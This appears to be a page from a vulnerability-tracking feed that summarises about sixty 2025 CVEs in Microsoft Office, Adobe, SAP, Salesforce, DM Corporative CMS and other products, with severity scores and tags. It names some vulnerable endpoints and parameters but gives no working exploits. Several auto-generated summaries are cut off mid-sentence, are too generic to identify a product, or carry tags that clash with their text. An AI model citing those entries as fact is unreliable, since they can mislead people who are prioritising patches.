490 CVEs tracked today. 15 Critical, 137 High, 321 Medium, 14 Low.
-
CVE-2025-49507
CRITICAL
CVSS 9.8
Critical deserialization of untrusted data vulnerability in LoftOcean CozyStay that enables object injection attacks. All versions before 1.7.1 are affected, allowing unauthenticated remote attackers to achieve complete system compromise (confidentiality, integrity, and availability impact) with no user interaction required. This is a network-exploitable vulnerability with CVSS 9.8 severity indicating maximum real-world risk.
Deserialization
-
CVE-2025-49455
CRITICAL
CVSS 9.8
Critical deserialization of untrusted data vulnerability in LoftOcean TinySalt that enables object injection attacks. This vulnerability affects TinySalt versions prior to 3.10.0 and allows unauthenticated remote attackers to achieve complete system compromise (confidentiality, integrity, and availability impact) with no user interaction required. The attack vector is network-based with low complexity, resulting in a CVSS 9.8 critical severity rating; exploitation status and POC availability cannot be confirmed from provided data, but the vulnerability's remote and unauthenticated nature suggests high real-world exploitability.
Deserialization
-
CVE-2025-47163
HIGH
CVSS 8.8
Critical deserialization vulnerability in Microsoft Office SharePoint that allows authenticated attackers to execute arbitrary code remotely without user interaction. The vulnerability affects SharePoint environments where untrusted data is deserialized, enabling network-based code execution with high impact to confidentiality, integrity, and availability. While no public exploit code has been confirmed in open intelligence sources, the CVSS 8.8 rating and low attack complexity suggest this is a high-priority patch for all affected organizations.
Microsoft
Office365
Deserialization
RCE
Sharepoint Enterprise Server
-
CVE-2025-43698
CRITICAL
CVSS 9.1
A remote code execution vulnerability (CVSS 9.1). Critical severity with potential for significant impact on affected systems.
Salesforce
Privilege Escalation
Information Disclosure
-
CVE-2025-42989
CRITICAL
CVSS 9.6
Privilege escalation vulnerability in RFC inbound processing that fails to enforce proper authorization checks for authenticated users, allowing attackers to escalate privileges and critically compromise application integrity and availability. The vulnerability affects authenticated users (PR:L) with network accessibility (AV:N) and has a critical CVSS score of 9.6; without access to KEV, EPSS, or POC data, assessment indicates high real-world risk due to the low attack complexity (AC:L) and cross-boundary impact (S:C) combined with authentication bypass in authorization logic.
Privilege Escalation
-
CVE-2025-40657
CRITICAL
CVSS 9.8
Critical unauthenticated SQL injection vulnerability in DM Corporative CMS affecting the /modules/forms/collectform.asp endpoint via the 'codform' parameter, allowing remote attackers to execute arbitrary SQL commands without authentication. This vulnerability enables complete database compromise including data exfiltration, modification, and deletion with a CVSS score of 9.8. The exploitation likelihood depends on patch availability and active threat actor interest, though the network-accessible nature and lack of authentication requirements make this a severe priority for affected organizations.
SQLi
Dm Corporative Cms
-
CVE-2025-40656
CRITICAL
CVSS 9.8
Critical SQL injection vulnerability in DM Corporative CMS that allows unauthenticated remote attackers to execute arbitrary SQL commands through the 'cod' parameter in the /administer/node-selection/data.asp endpoint. This enables complete database compromise including unauthorized retrieval, creation, modification, and deletion of data. With a CVSS score of 9.8 and network-based attack vector requiring no authentication or user interaction, this represents an extremely high-severity threat to all exposed instances; exploitation status and proof-of-concept availability should be verified against current KEV and EPSS data.
SQLi
Information Disclosure
Dm Corporative Cms
-
CVE-2025-40655
CRITICAL
CVSS 9.8
Critical SQL injection vulnerability in DM Corporative CMS affecting the /antcatalogue.asp endpoint's 'name' parameter, allowing unauthenticated remote attackers to execute arbitrary SQL commands with complete database compromise (retrieval, creation, modification, deletion). With a CVSS 9.8 score, zero authentication requirements, and network-accessible attack surface, this vulnerability represents an immediate and severe risk to all exposed instances; exploitation likelihood is extremely high given the straightforward injection point and lack of input validation.
SQLi
Information Disclosure
Dm Corporative Cms
-
CVE-2025-40654
CRITICAL
CVSS 9.8
A critical SQL injection vulnerability (CVE-2025-40654) exists in DM Corporative CMS affecting the /antbuspre.asp endpoint, where the 'name' and 'cod' parameters are not properly sanitized. This unauthenticated, network-accessible vulnerability allows remote attackers to execute arbitrary SQL commands, enabling complete database compromise including data exfiltration, modification, and destruction. With a CVSS 9.8 score and network-exploitable attack surface, this represents a critical production risk if DM Corporative CMS is internet-facing.
SQLi
Information Disclosure
Dm Corporative Cms
-
CVE-2025-40585
CRITICAL
CVSS 9.9
Critical authentication bypass vulnerability affecting Energy Services products that use the G5DFR component, where default credentials allow unauthenticated remote attackers to gain full control and tamper with device outputs. The CVSS 9.9 score reflects the severe nature of this issue: no authentication required, network-accessible, with high integrity impact across system boundaries. This vulnerability poses an immediate threat to critical infrastructure and industrial control systems relying on Energy Services with G5DFR.
Authentication Bypass
Information Disclosure
-
CVE-2025-36852
CRITICAL
CVSS 9.4
CVE-2025-36852 is a security vulnerability (CVSS 9.4) that allows any contributor with pull request privileges. Critical severity with potential for significant impact on affected systems.
Authentication Bypass
Google
-
CVE-2025-33073
HIGH
CVSS 8.8
Windows SMB contains an improper access control vulnerability (CVE-2025-33073, CVSS 8.8) enabling authenticated attackers to escalate privileges over the network. KEV-listed with EPSS 57.6% and public PoC, this vulnerability in the core Windows file sharing protocol affects every Windows system on the network, enabling lateral movement from any compromised domain account to SYSTEM-level access on SMB-accessible systems.
Microsoft
Information Disclosure
Windows Server 2022
Windows 11 24h2
Windows 10 21h2
-
CVE-2025-33068
HIGH
CVSS 7.5
Windows Standards-Based Storage Management Service contains an uncontrolled resource consumption vulnerability allowing unauthenticated network attackers to cause denial of service. The service manages storage operations and its disruption affects storage provisioning and management on Windows servers.
Microsoft
Denial Of Service
Windows
Windows Server 2012
Windows Server 2019
-
CVE-2025-33053
HIGH
CVSS 8.8
Windows Internet Shortcut Files (.url) contain an external control vulnerability (CVE-2025-33053, CVSS 8.8) that enables remote code execution over a network. KEV-listed with EPSS 48.5% and public PoC, this vulnerability allows attackers to craft malicious .url files that execute arbitrary code when opened, bypassing the security restrictions normally applied to internet-sourced shortcut files.
Microsoft
Windows
RCE
Path Traversal
Windows Server 2016
-
CVE-2025-32724
HIGH
CVSS 7.5
Windows Local Security Authority Subsystem Service (LSASS) contains an uncontrolled resource consumption vulnerability that allows unauthenticated remote attackers to cause a denial of service. Crashing or degrading LSASS disrupts all authentication and authorization on the affected Windows server, effectively taking the system offline.
Microsoft
Authentication Bypass
Windows 10 21h2
Windows Server 2012
Windows 11 24h2
-
CVE-2025-30220
CRITICAL
CVSS 9.9
A remote code execution vulnerability in GeoServer (CVSS 9.9) that allows users. Risk factors: public PoC available. Vendor patch is available.
XXE
Geonetwork
Geotools
Geoserver
-
CVE-2025-27817
HIGH
CVSS 7.5
A possible arbitrary file read and SSRF vulnerability (CVSS 7.5) that allows clients. Risk factors: EPSS 17% exploitation probability.
Apache
SSRF
Kafka
Redhat
Suse
-
CVE-2025-4653
HIGH
CVSS 7.0
OS command injection vulnerability in the backup name field of Pandora ITSM 5.0.105 that results from improper neutralization of special elements (CWE-77). An authenticated attacker with high privileges can inject arbitrary OS commands through the backup name parameter, potentially achieving code execution with high confidentiality impact. The CVSS 7.0 score reflects the requirement for privileged access (PR:H), but the network-accessible attack vector (AV:N) and low attack complexity (AC:L) indicate this is a practical threat in enterprise environments where administrative accounts may be compromised or abused.
Command Injection
-
CVE-2025-2474
CRITICAL
CVSS 9.8
A security vulnerability in the PCX image codec in QNX SDP (CVSS 9.8) that allows an unauthenticated attacker. Critical severity with potential for significant impact on affected systems.
Buffer Overflow
Qnx Software Development Platform
-
CVE-2025-1041
CRITICAL
CVSS 9.9
CVE-2025-1041 is a security vulnerability (CVSS 9.9) that allows an unauthorized remote command. Critical severity with potential for significant impact on affected systems.
Authentication Bypass
Call Management System
-
CVE-2024-57190
CRITICAL
CVSS 9.8
Erxes versions prior to 1.6.1 contain a critical authentication bypass vulnerability where attackers can impersonate any user by injecting arbitrary values into the 'User' HTTP header, gaining unauthorized access to all GraphQL endpoints. This CWE-284 (Incorrect Access Control) flaw requires no authentication credentials, no user interaction, and can be exploited over the network with trivial complexity, resulting in complete compromise of confidentiality, integrity, and availability (CVSS 9.8). The vulnerability likely has active exploitation potential given the simplicity of the attack vector and the critical nature of authentication bypass flaws in widely deployed platforms.
Authentication Bypass
Erxes
-
CVE-2024-34711
CRITICAL
CVSS 9.3
CVE-2024-34711 is an improper URI validation vulnerability in GeoServer that allows unauthenticated attackers to bypass XML External Entity (XXE) filtering and perform information disclosure attacks against internal networks. The vulnerability affects GeoServer versions prior to 2.25.0, where a weak regex pattern in the PreventLocalEntityResolver class fails to adequately block malicious URIs, enabling attackers to make arbitrary HTTP requests and scan internal infrastructure. With a CVSS score of 9.3 and high exploitation probability, this vulnerability poses a significant risk for network reconnaissance and potential lateral movement attacks.
Authentication Bypass
Geoserver
-
CVE-2025-49511
HIGH
CVSS 7.1
Cross-Site Request Forgery (CSRF) vulnerability in uxper Civi Framework versions up to 2.1.6 that allows unauthenticated attackers to perform unauthorized actions on behalf of authenticated users. The vulnerability has a CVSS score of 7.1 (High) with high availability and integrity impact, though it requires user interaction (UI:R) to exploit. Without confirmed KEV status or EPSS data, the actual exploitation likelihood remains uncertain, but the network-accessible attack vector and low complexity suggest moderate real-world risk for organizations running affected Civi Framework versions.
CSRF
-
CVE-2025-49454
HIGH
CVSS 8.1
PHP Local File Inclusion (LFI) vulnerability in LoftOcean TinySalt versions before 3.10.0, caused by improper control of filenames in PHP include/require statements (CWE-98). An unauthenticated remote attacker can exploit this network-accessible vulnerability with moderate complexity to read arbitrary files, execute code, and potentially achieve remote code execution, though exploitation requires specific conditions due to high attack complexity. The vulnerability has not been confirmed as actively exploited in the wild (KEV status unknown), but represents a critical risk for exposed TinySalt installations.
PHP
Information Disclosure
-
CVE-2025-49142
HIGH
CVSS 7.1
A remote code execution vulnerability in Nautobot (CVSS 7.1). High-severity vulnerability requiring prompt remediation. Vendor patch is available.
Python
Authentication Bypass
Nautobot
-
CVE-2025-47977
HIGH
CVSS 8.2
Cross-site scripting (XSS) vulnerability in the Nuance Digital Engagement Platform that allows unauthenticated attackers to inject malicious scripts into web pages generated by the platform. This vulnerability enables spoofing attacks and potential credential theft or session hijacking over the network with only user interaction required. With a CVSS score of 8.2 and network-accessible attack vector, this represents a significant risk to organizations deploying Nuance's engagement platform, particularly given the high impact on confidentiality and cross-site scope implications.
XSS
Nuance Digital Engagement Platform
-
CVE-2025-47968
HIGH
CVSS 7.8
CVE-2025-47968 is an improper input validation vulnerability in Microsoft AutoUpdate (MAU) that allows a locally authenticated attacker to achieve privilege escalation on affected systems. The vulnerability has a CVSS score of 7.8 (High), indicating significant impact with confidentiality, integrity, and availability compromise. Active exploitation status and proof-of-concept availability cannot be confirmed from provided data, but the local attack vector with low complexity and low privilege requirement suggests elevated real-world risk for multi-user or shared systems.
Microsoft
Apple
Privilege Escalation
Autoupdate
-
CVE-2025-47962
HIGH
CVSS 7.8
CVE-2025-47962 is an improper access control vulnerability in Windows SDK that allows an authenticated local attacker to escalate privileges without user interaction. The vulnerability affects Windows SDK components and presents a high risk due to its CVSS score of 7.8 (High severity) with high impact on confidentiality, integrity, and availability. While no active exploitation in the wild (KEV status) or public POC has been confirmed at this time, the low attack complexity and requirement for only local user privileges make this a significant priority for Windows environments.
Microsoft
Windows
Privilege Escalation
Windows Software Development Kit
-
CVE-2025-47957
HIGH
CVSS 8.4
Use-after-free vulnerability in Microsoft Office Word that allows local, unauthenticated attackers to execute arbitrary code with high privileges. The vulnerability affects Word processing functionality and requires no user interaction, making it a critical local privilege escalation vector. Without confirmed KEV status or public POC availability, real-world exploitation likelihood should be assessed against EPSS data and patch availability from Microsoft security advisories.
Use After Free
Microsoft
Windows
RCE
Office Long Term Servicing Channel
-
CVE-2025-47955
HIGH
CVSS 7.8
Privilege escalation vulnerability in Windows Remote Access Connection Manager that allows an authenticated local attacker to elevate privileges to a higher integrity level without user interaction. The vulnerability affects Windows systems with Remote Access Connection Manager enabled and has a CVSS score of 7.8 (High severity). While no active exploitation in the wild has been publicly confirmed at this time, the local attack vector combined with low complexity and no user interaction requirement makes this a significant risk for multi-user or compromised systems where an attacker already has local access.
Microsoft
Privilege Escalation
Windows
Windows Server 2022
Windows 10 1507
-
CVE-2025-47953
HIGH
CVSS 8.4
A use-after-free vulnerability in Microsoft Office (CVSS 8.4) that allows an unauthorized attacker. High-severity vulnerability requiring prompt remediation.
Microsoft
Use After Free
RCE
365 Apps
Office Long Term Servicing Channel
-
CVE-2025-47849
HIGH
CVSS 8.8
A privilege escalation vulnerability in Apache CloudStack (CVSS 8.8) that allows the attacker. High-severity vulnerability requiring prompt remediation.
Apache
Privilege Escalation
Information Disclosure
Cloudstack
-
CVE-2025-47713
HIGH
CVSS 8.8
A privilege escalation vulnerability in Apache CloudStack (CVSS 8.8) that allows the attacker. High-severity vulnerability requiring prompt remediation.
Apache
Privilege Escalation
Denial Of Service
Information Disclosure
Cloudstack
-
CVE-2025-47176
HIGH
CVSS 7.8
Local code execution vulnerability in Microsoft Office Outlook triggered by improper path traversal handling (CWE-35) in the '.../...//' sequence. Authorized users with local access can exploit this to execute arbitrary code with the privileges of the Outlook process, achieving high confidentiality, integrity, and availability impact. This vulnerability requires local access and existing user privileges but no user interaction, making it a significant risk for multi-user systems or compromised local accounts.
Microsoft
Outlook
Windows
RCE
365 Apps
-
CVE-2025-47175
HIGH
CVSS 7.8
Use-after-free vulnerability in Microsoft Office PowerPoint that allows an unauthenticated local attacker to execute arbitrary code with high integrity and confidentiality impact. The vulnerability requires user interaction (opening a malicious PowerPoint file) but no elevated privileges, making it accessible to standard user accounts. With a CVSS score of 7.8 and local attack vector, this represents a moderate-to-high severity risk for organizations where PowerPoint is widely deployed.
Microsoft
Denial Of Service
Office
Powerpoint
Office Long Term Servicing Channel
-
CVE-2025-47174
HIGH
CVSS 7.8
Heap-based buffer overflow vulnerability in Microsoft Office Excel that allows local attackers to execute arbitrary code with high privileges (confidentiality, integrity, and availability impact). The vulnerability requires user interaction (opening a malicious Excel file) but no special privileges, making it a practical threat to Excel users. With a CVSS score of 7.8 and local attack vector, this represents a significant code execution risk for organizations relying on Excel for document processing.
Microsoft
Buffer Overflow
Windows
RCE
Office Long Term Servicing Channel
-
CVE-2025-47173
HIGH
CVSS 7.8
CVE-2025-47173 is an improper input validation vulnerability in Microsoft Office that allows local code execution without requiring user privileges, though user interaction is needed. An attacker with local access can craft a malicious Office document that, when opened by a user, executes arbitrary code with the privileges of the affected Office application. This vulnerability affects Microsoft Office products across multiple versions and poses a moderate-to-high risk given its local attack vector and high impact on confidentiality, integrity, and availability.
Microsoft
RCE
Windows
Office Long Term Servicing Channel
Office
-
CVE-2025-47172
HIGH
CVSS 8.8
SQL injection vulnerability in Microsoft Office SharePoint that allows authenticated attackers to execute arbitrary code remotely without user interaction. The vulnerability affects SharePoint deployments where an authorized user can craft malicious SQL commands through improperly neutralized input fields. This is a high-severity issue (CVSS 8.8) with significant confidentiality, integrity, and availability impact, particularly concerning given SharePoint's role as a critical enterprise collaboration platform.
Microsoft
SQLi
Exchange
RCE
Sharepoint Enterprise Server
-
CVE-2025-47170
HIGH
CVSS 7.8
Use-after-free vulnerability in Microsoft Office Word that allows local, unauthenticated attackers to execute arbitrary code with high impact (confidentiality, integrity, availability). The vulnerability requires user interaction (e.g., opening a malicious document) but has low attack complexity, making it a significant local code execution threat. Without confirmed KEV status or EPSS data provided, the CVSS 7.8 score indicates high severity, though real-world exploitability depends on whether public exploits or proofs-of-concept have emerged.
Microsoft
Denial Of Service
365 Apps
Office Long Term Servicing Channel
-
CVE-2025-47169
HIGH
CVSS 7.8
Heap-based buffer overflow vulnerability in Microsoft Office Word that allows local, unauthenticated attackers to execute arbitrary code with high impact on confidentiality, integrity, and availability. The vulnerability requires user interaction (opening a malicious document) but no elevated privileges, making it a significant local code execution threat affecting Word users who open untrusted documents.
Microsoft
Buffer Overflow
Windows
RCE
Office
-
CVE-2025-47168
HIGH
CVSS 7.8
Use-after-free vulnerability in Microsoft Office Word that allows local, unauthenticated attackers to execute arbitrary code with high severity (CVSS 7.8). The vulnerability requires user interaction (opening a malicious document) but grants complete system compromise through code execution. This is a memory safety issue (CWE-416) in Word's document processing engine that could be actively exploited if public POC becomes available.
Use After Free
Microsoft
Windows
RCE
Office Long Term Servicing Channel
-
CVE-2025-47167
HIGH
CVSS 8.4
Type confusion vulnerability in Microsoft Office that allows unauthenticated local attackers to execute arbitrary code with high impact on confidentiality, integrity, and availability. The vulnerability exploits improper resource access due to incompatible type handling, requiring no user interaction or privileges. This is a critical local code execution vector affecting Microsoft Office installations.
Microsoft
Authentication Bypass
365 Apps
Office
Office Long Term Servicing Channel
-
CVE-2025-47166
HIGH
CVSS 8.8
Critical deserialization vulnerability in Microsoft Office SharePoint that allows authenticated attackers to execute arbitrary code remotely with high impact to confidentiality, integrity, and availability. The vulnerability affects SharePoint environments where an authorized user can submit malicious serialized objects, bypassing input validation due to unsafe deserialization practices (CWE-502). While the attack requires valid credentials (PR:L), the network-accessible attack vector (AV:N), low attack complexity (AC:L), and high CVSS score of 8.8 indicate significant real-world risk, particularly in organizations with broad internal user bases or federated access.
Microsoft
Deserialization
Exchange
RCE
Sharepoint Server
-
CVE-2025-47165
HIGH
CVSS 7.8
Use-after-free vulnerability in Microsoft Office Excel that allows local code execution with high severity (CVSS 7.8). An attacker with local access can trigger the vulnerability through user interaction (opening a malicious file) to execute arbitrary code with the privileges of the Excel process, potentially achieving full system compromise. No KEV status, active exploitation data, or public POC availability was confirmed in the provided dataset, but the high CVSS score and local attack vector indicate this requires prompt patching.
Use After Free
Microsoft
Windows
RCE
Excel
-
CVE-2025-47164
HIGH
CVSS 8.4
Use-after-free (UAF) vulnerability in Microsoft Office that allows unauthenticated local attackers to execute arbitrary code with no user interaction required. The vulnerability affects multiple Microsoft Office versions and has a CVSS score of 8.4 (High), indicating severe risk with high impact to confidentiality, integrity, and availability. Without publicly disclosed EPSS data or KEV confirmation provided, the actual exploitation likelihood in the wild remains unconfirmed, though the local attack vector and lack of privilege/interaction requirements suggest moderate real-world exploitability once weaponized.
Use After Free
Microsoft
RCE
Office
365 Apps
-
CVE-2025-47162
HIGH
CVSS 8.4
Heap-based buffer overflow vulnerability in Microsoft Office that allows unauthenticated local attackers to execute arbitrary code with high privileges. The vulnerability affects Microsoft Office products across multiple versions and requires no user interaction or special privileges to exploit. With a CVSS score of 8.4 and local attack vector, this represents a severe local privilege escalation and code execution risk; exploitation status and real-world activity should be verified against KEV catalogs and EPSS scoring.
Microsoft
Buffer Overflow
RCE
Windows
Office Long Term Servicing Channel
-
CVE-2025-47110
HIGH
CVSS 8.4
Adobe Commerce versions 2.4.8 and earlier contain a stored Cross-Site Scripting (XSS) vulnerability (CVE-2025-47110, CVSS 8.4) in form field validation that allows high-privileged attackers to inject malicious JavaScript into the application. When other high-privileged users view pages containing the injected payload, the malicious script executes in their browser context, potentially compromising confidentiality, integrity, and availability across multiple privileged accounts. The vulnerability requires high privileges to exploit but affects other high-privileged users, making it a significant concern in multi-admin environments.
Adobe
XSS
Privilege Escalation
Magento
Commerce
-
CVE-2025-47108
HIGH
CVSS 7.8
CVE-2025-47108 is an out-of-bounds write vulnerability in Adobe Substance3D Painter versions 11.0.1 and earlier that allows arbitrary code execution with user-level privileges. The vulnerability requires user interaction (specifically, opening a malicious file), making it a file-based attack vector. The CVSS 3.1 score of 7.8 indicates high severity with a local attack surface, and exploitation depends on social engineering to deliver the malicious file.
Buffer Overflow
RCE
Adobe
Substance 3d Painter
-
CVE-2025-47107
HIGH
CVSS 7.8
Heap-based buffer overflow vulnerability in Adobe InCopy versions 20.2, 19.5.3 and earlier that allows arbitrary code execution with the privileges of the current user. The vulnerability requires user interaction (opening a malicious file) and presents a high-severity risk due to its direct code execution capability; exploitation likelihood and real-world attack status cannot be fully assessed without KEV confirmation or public POC availability.
Buffer Overflow
RCE
Adobe
Incopy
-
CVE-2025-46840
HIGH
CVSS 8.7
CVE-2025-46840 is an Improper Authorization vulnerability in Adobe Experience Manager (AEM) versions 6.5.22 and earlier that allows low-privileged attackers to escalate privileges and bypass security controls, potentially achieving session takeover. The vulnerability requires user interaction and has a CVSS score of 8.7 with high confidentiality and integrity impact. While no active exploitation in the wild (KEV status) or public proof-of-concept is currently documented, the network-accessible attack vector and low attack complexity combined with privilege escalation capabilities make this a high-priority patch candidate for organizations running affected AEM instances.
Adobe
Privilege Escalation
Authentication Bypass
Experience Manager
-
CVE-2025-46837
HIGH
CVSS 8.7
Adobe Experience Manager (AEM) versions 6.5.22 and earlier contain a reflected Cross-Site Scripting (XSS) vulnerability in form field handling that allows low-privileged attackers to inject malicious JavaScript. When a victim visits a page containing the vulnerable field with attacker-controlled input, the script executes in their browser context, enabling session hijacking and credential theft. The vulnerability has a CVSS score of 8.7 (High) and requires user interaction but no special privileges beyond basic AEM access.
Adobe
XSS
Information Disclosure
Experience Manager
-
CVE-2025-46612
HIGH
CVSS 7.2
CVE-2025-46612 is an unrestricted file upload vulnerability in Airleader Master and Easy versions prior to 6.36 that allows authenticated administrators to execute arbitrary commands on the server via malicious JSP file uploads through the Panel Designer dashboard. While requiring high-privilege credentials (administrator login), the vulnerability is particularly dangerous due to weak default credentials and the ease of exploitation. No active KEV designation or widespread POC availability has been confirmed, but the straightforward attack vector and high impact make this a significant priority for organizations using affected versions.
File Upload
Easy Firmware
-
CVE-2025-44044
HIGH
CVSS 7.5
Keyoti SearchUnit versions prior to 9.0.0 contain an XML External Entity (XXE) injection vulnerability that allows unauthenticated remote attackers to exfiltrate sensitive files from affected systems. The vulnerability has a CVSS 3.1 score of 7.5 (High) with a network attack vector, no privileges required, and no user interaction needed. While no public POC or active in-the-wild exploitation has been widely documented, the straightforward attack vector and high confidentiality impact make this a significant risk for organizations running vulnerable SearchUnit instances.
XXE
-
CVE-2025-43701
HIGH
CVSS 7.5
CVE-2025-43701 is an Improper Preservation of Permissions vulnerability in Salesforce OmniStudio FlexCards that allows unauthenticated network attackers to read Custom Settings data without authorization. Affecting OmniStudio versions before 254, this high-severity flaw (CVSS 7.5) enables direct exposure of sensitive configuration data through a low-complexity attack requiring no user interaction or privileges. While KEV status and active exploitation details are not available in provided data, the combination of high CVSS score, unauthenticated attack vector, and direct confidentiality impact indicates significant real-world risk to Salesforce deployments storing sensitive configuration in Custom Settings.
Information Disclosure
Salesforce
Privilege Escalation
-
CVE-2025-43700
HIGH
CVSS 7.5
CVE-2025-43700 is an Improper Preservation of Permissions vulnerability in Salesforce OmniStudio FlexCards that allows unauthenticated network-based attackers to expose encrypted data without requiring user interaction. This high-impact confidentiality breach (CVSS 7.5) affects OmniStudio versions prior to Spring 2025 release and represents a significant risk to organizations using FlexCards for sensitive data handling, particularly given the low attack complexity and absence of privilege requirements.
Information Disclosure
Salesforce
Privilege Escalation
-
CVE-2025-43697
HIGH
CVSS 7.5
Improper Preservation of Permissions vulnerability in Salesforce OmniStudio's DataMapper component that allows unauthenticated network-based attackers to expose encrypted data without requiring user interaction. The vulnerability affects OmniStudio versions prior to Spring 2025 and carries a CVSS 7.5 (High) severity rating. While specific KEV status and EPSS data were not provided in the intelligence sources, the high CVSS score combined with unauthenticated access (AV:N, PR:N) indicates this is a significant exposure risk for organizations using affected OmniStudio deployments.
Information Disclosure
Salesforce
Privilege Escalation
-
CVE-2025-43593
HIGH
CVSS 7.8
CVE-2025-43593 is an out-of-bounds write vulnerability in Adobe InDesign Desktop that enables arbitrary code execution with high severity (CVSS 7.8). Affected versions include ID20.2, ID19.5.3 and earlier on local systems. Exploitation requires user interaction (opening a malicious file), but once triggered, grants full code execution capabilities in the context of the current user. Current KEV and EPSS status unknown from provided data, but the local attack vector combined with user interaction requirement and high CVSS score indicates moderate-to-high real-world risk for targeted attacks against design professionals.
Buffer Overflow
RCE
Adobe
Indesign
-
CVE-2025-43590
HIGH
CVSS 7.8
CVE-2025-43590 is an out-of-bounds write vulnerability in Adobe InDesign Desktop that allows arbitrary code execution with the privileges of the current user. Affected versions include ID20.2, ID19.5.3, and earlier releases. Exploitation requires user interaction (specifically, opening a malicious file), but once triggered it grants an attacker full code execution capabilities in the context of the authenticated user.
Buffer Overflow
RCE
Adobe
Indesign
-
CVE-2025-43589
HIGH
CVSS 7.8
Use-after-free vulnerability in Adobe InDesign Desktop that allows arbitrary code execution with the privileges of the current user. Affected versions are InDesign ID20.2, ID19.5.3, and earlier; exploitation requires a victim to open a malicious file. This is a high-severity local vulnerability with user interaction required, but without confirmed active exploitation data or public POC availability indicated in the provided intelligence.
Use After Free
RCE
Adobe
Indesign
-
CVE-2025-43588
HIGH
CVSS 7.8
A remote code execution vulnerability (CVSS 7.8). High-severity vulnerability requiring prompt remediation.
Buffer Overflow
RCE
Adobe
Substance 3d Sampler
-
CVE-2025-43586
HIGH
CVSS 8.1
A remote code execution vulnerability (CVSS 8.1). High-severity vulnerability requiring prompt remediation.
Adobe
Privilege Escalation
Commerce
Commerce B2b
Magento
-
CVE-2025-43585
HIGH
CVSS 8.2
Adobe Commerce versions 2.4.8 and earlier contain an improper authorization vulnerability (CWE-285) that allows unauthenticated attackers to bypass security features and gain unauthorized access to sensitive functionality. This vulnerability has a high integrity impact and can be exploited remotely without user interaction, making it a critical priority for Adobe Commerce administrators. The 8.2 CVSS score combined with the network-accessible attack vector and lack of authentication requirements indicates significant real-world risk.
Adobe
Authentication Bypass
PHP
Magento
Commerce B2b
-
CVE-2025-43581
HIGH
CVSS 7.8
CVE-2025-43581 is an out-of-bounds write vulnerability in Adobe Substance3D - Sampler (versions 5.0 and earlier) that enables arbitrary code execution within the current user's security context. The vulnerability requires user interaction (specifically, opening a malicious file), making it a file-based attack vector. With a CVSS score of 7.8 and high impact ratings for confidentiality, integrity, and availability, this represents a significant local privilege escalation risk for affected users, though exploitation requires social engineering or file delivery mechanisms.
Buffer Overflow
RCE
Substance 3d Sampler
-
CVE-2025-43577
HIGH
CVSS 7.8
Use After Free (UAF) vulnerability in Adobe Acrobat Reader that allows arbitrary code execution with the privileges of the current user. Affected versions include 24.001.30235, 20.005.30763, 25.001.20521 and earlier across multiple release tracks. Exploitation requires user interaction (opening a malicious PDF file), but the high CVSS score of 7.8 and local attack vector indicate significant real-world risk; KEV and active exploitation status should be confirmed from official sources.
RCE
Adobe
Use After Free
Acrobat
Acrobat Dc
-
CVE-2025-43576
HIGH
CVSS 7.8
A remote code execution vulnerability (CVSS 7.8). High-severity vulnerability requiring prompt remediation.
RCE
Adobe
Denial Of Service
Acrobat Reader Dc
Acrobat
-
CVE-2025-43575
HIGH
CVSS 7.8
CVE-2025-43575 is an out-of-bounds write vulnerability in Adobe Acrobat Reader that enables arbitrary code execution with high integrity and confidentiality impact. Affected versions include 24.001.30235, 20.005.30763, 25.001.20521 and earlier across multiple product lines. Exploitation requires user interaction (opening a malicious PDF), but once triggered, allows code execution in the context of the current user with no privilege elevation needed.
Buffer Overflow
Adobe
RCE
Acrobat Dc
Acrobat
-
CVE-2025-43574
HIGH
CVSS 7.8
Use After Free (UAF) vulnerability in Adobe Acrobat Reader affecting versions 24.001.30235, 20.005.30763, 25.001.20521 and earlier that enables arbitrary code execution with the privileges of the current user. The vulnerability requires user interaction (opening a malicious PDF file) but has a high CVSS score of 7.8 due to the severity of potential code execution impact. Without confirmed KEV listing or public POC data provided, this represents a significant but not yet confirmed active threat.
RCE
Adobe
Use After Free
Acrobat Dc
Acrobat
-
CVE-2025-43573
HIGH
CVSS 7.8
Use After Free (UAF) vulnerability in Adobe Acrobat Reader that enables arbitrary code execution with high privilege context on affected systems. The vulnerability impacts multiple versions across different release branches (24.001.30235, 20.005.30763, 25.001.20521 and earlier), requiring only user interaction to trigger exploitation via malicious PDF files. With a CVSS score of 7.8 and no privilege escalation required, this represents a significant risk to enterprise and consumer users relying on Acrobat Reader for document handling.
RCE
Adobe
Use After Free
Acrobat Reader Dc
Acrobat Reader
-
CVE-2025-43558
HIGH
CVSS 7.8
A remote code execution vulnerability (CVSS 7.8). High-severity vulnerability requiring prompt remediation.
Buffer Overflow
RCE
Adobe
Indesign
-
CVE-2025-43550
HIGH
CVSS 7.8
Use After Free vulnerability in Adobe Acrobat Reader that enables arbitrary code execution with user-level privileges when a victim opens a malicious PDF file. Affected versions include 24.001.30235, 20.005.30763, 25.001.20521 and earlier across multiple product lines. This vulnerability requires user interaction but presents high severity due to memory corruption leading to code execution, with exploitation probability and active exploitation status dependent on available public exploits.
RCE
Adobe
Use After Free
Acrobat Reader
Acrobat Dc
-
CVE-2025-42995
HIGH
CVSS 7.5
Denial-of-service vulnerability in SAP MDM Server's Read function that allows unauthenticated network attackers to trigger memory read access violations by sending specially crafted packets, causing the server process to crash and become unavailable. The vulnerability affects SAP MDM Server with a CVSS score of 7.5 (high severity) but is limited to availability impact with no confidentiality or integrity compromise. Status of active exploitation (KEV) and proof-of-concept availability are not specified in available intelligence.
Sap
Denial Of Service
Memory Corruption
-
CVE-2025-42994
HIGH
CVSS 7.5
Denial-of-service vulnerability in SAP MDM Server's ReadString function that allows unauthenticated remote attackers to trigger memory read access violations causing unexpected server process termination. The vulnerability affects SAP Master Data Management (MDM) Server and has a CVSS score of 7.5 with high availability impact; no confidentiality or integrity compromise occurs. This is a network-accessible denial-of-service vector with low attack complexity and no authentication requirements, making it a significant availability risk for organizations deploying SAP MDM infrastructure.
Sap
Denial Of Service
Memory Corruption
-
CVE-2025-42983
HIGH
CVSS 8.5
High-severity authentication bypass vulnerability in SAP Business Warehouse and SAP Plug-In Basis that allows authenticated attackers to drop arbitrary database tables, resulting in data loss or system unavailability. The vulnerability requires valid credentials but no user interaction, affecting systems across the network with a CVSS score of 8.5. While confidentiality impact is limited (the attacker cannot read data), dropping tables has severe integrity and availability consequences, making this a critical integrity and availability threat for SAP deployments.
Sap
Denial Of Service
Privilege Escalation
-
CVE-2025-42982
HIGH
CVSS 8.8
